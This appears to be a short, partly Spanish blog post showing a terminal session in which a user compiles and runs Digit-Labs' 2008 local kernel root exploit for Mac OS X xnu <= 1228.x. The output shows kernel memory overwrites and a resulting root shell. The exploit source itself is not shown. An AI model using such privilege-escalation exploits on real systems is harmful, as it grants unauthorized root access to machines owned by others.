MacOSX too!

imac-de-fernando-quintero:~ fernandoquintero$ nano exp.c
imac-de-fernando-quintero:~ fernandoquintero$ gcc -o exp exp.c
imac-de-fernando-quintero:~ fernandoquintero$ mv exp xnu-hfs-fcntl-v2
imac-de-fernando-quintero:~ fernandoquintero$ nano exp.sh
imac-de-fernando-quintero:~ fernandoquintero$ sh exp.sh
-en Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@


-n * creating diskimage...
done
-n * attaching/mounting diskimage...
done
-e * executing exploit...

Apple MACOS X xnu <= 1228.x local kernel root exploit by:
http://www.digit-labs.org/ -- Digit-Labs 2008!@$!

* getattrlist...done
** attrlist length: 36
** fndrinfo:
* done

* setattrlist...done
* overwriting @0x0050770C
* done

* setattrlist...done
* overwriting @0x00507998
** sysent[21].sy_call: 0x0050770C
* done

* jumping...done

* getuid(): 0
+Wh00t

bash-3.2# id
uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),102(com.apple.sharepoint.group.2),101(com.apple.sharepoint.group.1),4(tty),103(com.apple.sharepoint.group.3),5(operator),80(admin),20(staff)
bash-3.2#

Y para salir?, un exploit decente:

bash-3.2# touch file
bash-3.2# ls -la file
-rw-r--r-- 1 root staff 0 May 17 23:43 file
bash-3.2# exit
exit
-n * detaching/unmounting diskimage...
done
imac-de-fernando-quintero:~ fernandoquintero$

LOL